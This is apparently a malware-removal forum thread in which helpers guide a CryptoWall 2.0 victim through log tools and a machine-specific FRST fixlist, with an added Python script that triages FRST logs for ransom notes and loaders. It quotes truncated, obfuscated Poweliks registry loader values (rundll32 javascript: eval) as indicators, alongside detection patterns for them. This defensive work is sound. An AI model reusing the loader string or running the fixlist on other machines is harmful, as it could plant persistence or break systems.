cryptowall 2.0

At this point I’ve lost where I am in the steps. Managed to do the malware download and save .txt. Have started the Farbar … and get blue screen, Windows shuts down… three times now. Attaching what I have. Can’t even print to save instructions except for the stupid Decrypt Instruct that shows automatically every time the computer restarts.

I’m afraid to report, you’re pretty much screwed. While we can remove the actual infection, we cannot remove the encryption. Your best bet is any backups you may or may not have.

I will notify a remover to see if they can still assist you without FRST, which almost surely they can.

Also, your MBAM log is far from complete. It’s got the heading and that’s it.

Are you able to get into safe mode? If so, try FRST from there.

If not, I will post other instructions shortly.

Sending some results… FRST and a screenshot of Malwarebytes (if that helps).

Could you attach the main FRST.txt please? I now have 2 Additions.

Scan with IDTool

Please download IDTool by Nathan and save the file to the desktop.
It will come as a zipped file, so you will need to unzip it. You may do it by right-clicking on it and choosing Extract All. Extract it to your desktop.

[*]Enter the IDTool directory, right-click on the IDTool icon and select Run as Administrator to start the tool.
[*]IDTool needs the Microsoft .NET Framework environment to work properly, so if prompted to download & install it please agree.
[*]Wait patiently until the tool has collected the necessary data.
[*]Once the main console is loaded, please press Rescan Computer and Generate a New Report.
[*]When prompted at the main bar that Rescan is completed, press Generate Text Friendly Report for Forums.
[*]Copy the entire content of the frame that appears. You may want to save it to a text file for your convenience.

Please include those contents in your next reply.

I keep getting booted off…Try again

Do you have any backups that you can use to recover your documents etc.?

CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open notepad and copy/paste the text in the quotebox below into it:

HKU\S-1-5-21-2109097572-556501836-756160637-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
SearchScopes: HKCU - {F678A9CB-BE53-4D91-83D2-C3D9FC879CB0} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3291325&CUI=UN11544018101162016&UM=2
BHO: No Name -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> No File
BHO-x32: No Name -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> No File
Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File
Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - No File
2014-11-11 12:07 - 2014-11-11 12:07 - 00008512 _____ () C:\Users\E Diane Champé\Downloads\DECRYPT_INSTRUCTION.HTML
2014-11-11 12:07 - 2014-11-11 12:07 - 00008512 _____ () C:\Users\E Diane Champé\Documents\DECRYPT_INSTRUCTION.HTML
2014-11-11 12:07 - 2014-11-11 12:07 - 00008512 _____ () C:\Users\E Diane Champé\DECRYPT_INSTRUCTION.HTML
2014-11-11 12:07 - 2014-11-11 12:07 - 00004196 _____ () C:\Users\E Diane Champé\Downloads\DECRYPT_INSTRUCTION.TXT
2014-11-11 12:07 - 2014-11-11 12:07 - 00004196 _____ () C:\Users\E Diane Champé\Documents\DECRYPT_INSTRUCTION.TXT
2014-11-11 12:07 - 2014-11-11 12:07 - 00004196 _____ () C:\Users\E Diane Champé\DECRYPT_INSTRUCTION.TXT
2014-11-11 12:04 - 2014-11-11 12:04 - 00008512 _____ () C:\Users\E Diane Champé\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-11 12:04 - 2014-11-11 12:04 - 00008512 _____ () C:\Users\E Diane Champé\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-11 12:04 - 2014-11-11 12:04 - 00008512 _____ () C:\Users\E Diane Champé\AppData\DECRYPT_INSTRUCTION.HTML
2014-11-11 12:04 - 2014-11-11 12:04 - 00008512 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-11-11 12:04 - 2014-11-11 12:04 - 00004196 _____ () C:\Users\E Diane Champé\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-11-11 12:04 - 2014-11-11 12:04 - 00004196 _____ () C:\Users\E Diane Champé\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-11-11 12:04 - 2014-11-11 12:04 - 00004196 _____ () C:\Users\E Diane Champé\AppData\DECRYPT_INSTRUCTION.TXT
2014-11-11 12:04 - 2014-11-11 12:04 - 00004196 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-11-10 16:25 - 2014-11-10 16:25 - 00041925 ____H () C:\Users\E Diane Champé\Documents\~WRL3478.tmp
2014-11-09 17:15 - 2014-11-11 12:03 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-10-22 15:34 - 2014-11-17 12:21 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
CustomCLSID: HKU\S-1-5-21-2109097572-556501836-756160637-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-2109097572-556501836-756160637-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\wdigest.dll No File
Reg: reg delete "HKCU\Software\7BE9D9A379551CE69739F1D99A3FAE67\1336779999AADEFF"
EmptyTemp:
CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe.
Run FRST and press Fix.
On completion a log will be generated; please post that.

THEN

Download and run Farbar Service Scanner.

Tick “All” options.
Press “Scan”.
It will create a log (FSS.txt) in the same directory the tool is run.

Please copy and paste the log to your reply.
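The fixlist above targets two distinct things: a registry-resident script loader (the CustomCLSID entries FRST flagged as Poweliks, whose COM server value is a rundll32 javascript: invocation rather than a file) and the CryptoWall ransom notes dropped beside the encrypted documents. The script below is an added example, not part of this thread and not FRST's own code: it parses FRST-style lines and pulls out exactly those two indicator types so a helper can triage a log before writing a fix. The sample lines are constructed from the shape of the entries quoted above, with a made-up SID and user name.

```python
import re
from collections import Counter

# Constructed sample, modelled on the FRST lines quoted in the fix above
# (made-up SID and user name; the CLSID data is truncated the way FRST prints it).
SAMPLE_FRST_LINES = r"""
CustomCLSID: HKU\S-1-5-21-1111111111-222222222-333333333-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-1111111111-222222222-333333333-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\wdigest.dll No File
2014-11-11 12:07 - 2014-11-11 12:07 - 00008512 _____ () C:\Users\victim\Documents\DECRYPT_INSTRUCTION.HTML
2014-11-11 12:07 - 2014-11-11 12:07 - 00004196 _____ () C:\Users\victim\Documents\DECRYPT_INSTRUCTION.TXT
2014-11-11 12:04 - 2014-11-11 12:04 - 00008512 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-11-10 16:25 - 2014-11-10 16:25 - 00041925 ____H () C:\Users\victim\Documents\~WRL3478.tmp
C:\Windows\System32\svchost.exe => File is digitally signed
"""

# A CustomCLSID line: the registry key, which server subkey it is, and the value FRST read.
CLSID_LINE = re.compile(
    r"^CustomCLSID:\s+(?P<key>\S+\\CLSID\\(?P<clsid>\{[0-9A-Fa-f-]+\})\\(?P<server>localserver32|inprocserver32))\s+->\s+(?P<value>.*)$",
    re.IGNORECASE)
# Fileless loader pattern: the COM server value is not a path but a rundll32 call into
# the javascript: protocol handler via mshtml (what FRST labelled "Poweliks" above).
SCRIPT_LOADER = re.compile(r"rundll32\.exe\s+javascript:|mshtml,RunHTMLApplication", re.IGNORECASE)
# CryptoWall ransom notes, as they appear at the end of FRST file-listing lines.
RANSOM_NOTE = re.compile(r"\\(?P<note>DECRYPT_INSTRUCTION\.(?:HTML|TXT))\s*$", re.IGNORECASE)


def triage_frst(text):
    """Summarise the loader CLSIDs, orphaned CLSID servers and ransom notes in FRST output."""
    findings = {"script_loader_clsid": [], "missing_clsid_file": [], "ransom_notes": Counter()}
    for line in text.splitlines():
        line = line.strip()
        m = CLSID_LINE.match(line)
        if m:
            if SCRIPT_LOADER.search(m.group("value")):
                findings["script_loader_clsid"].append((m.group("clsid"), m.group("server").lower()))
            elif m.group("value").endswith("No File"):
                # Server DLL no longer on disk: a leftover registration worth removing.
                findings["missing_clsid_file"].append((m.group("clsid"), m.group("value")[:-len("No File")].strip()))
            continue
        n = RANSOM_NOTE.search(line)
        if n:
            findings["ransom_notes"][n.group("note").upper()] += 1
    return findings


if __name__ == "__main__":
    for kind, hits in triage_frst(SAMPLE_FRST_LINES).items():
        print(kind, dict(hits) if isinstance(hits, Counter) else hits)
```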

I’m hoping the weird things (I have to fill in the verification code 4+ times and then re-log into the forum, sometimes restart the browser) are related to the CryptoWall??? Am trying to run the Farbar Service Scanner.

Now you have posted 3 times, the captcha is history.

I can’t download the Farbar service security… actually I downloaded it in SafeZone, but I can’t open it. A message that I don’t have the required privilege appears. I’m the only user/administrator on this computer. Any suggestions?

Right Click > Run as Admin. Does that work?

No

You will not be able to run it from SafeZone; you will need to download it to your desktop and run it from there.

Was able to download on another computer and then run it. Here’s the log:
##########################
Farbar Service Scanner Version: 21-07-2014
Ran by E Diane Champé (administrator) on 17-11-2014 at 16:46:58
Running from "I:"
Microsoft Windows 7 Home Premium Service Pack 1 (X64)
Boot Mode: Normal


Internet Services:

Connection Status:

Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.

Windows Firewall:

Firewall Disabled Policy:

System Restore:

System Restore Disabled Policy:

Action Center:

Windows Update:

Windows Autoupdate Disabled Policy:

Windows Defender:

Other Services:

File Check:

C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed

**** End of log ****

How is the computer behaving at the moment?

Can’t see a difference. My documents are still garbled. Is that permanent? Attaching an example. What should I look for?

That is there to stay until deleted. Your infection encrypted all your documents, and there is no way to decrypt them.

Ran Malwarebytes and zero threats found, but when I run the IDTool it says one threat still exists. I must say, the speed has returned (yah) and my backup will recover most docs. Do I simply delete all the encrypted docs (we’re talking many GBs) and then empty the trash bin? What’s the correct way to proceed?

Yes, as they will be scattered around the system and my tools will not find them all.

Apart from the encrypted documents, are you experiencing any other problems?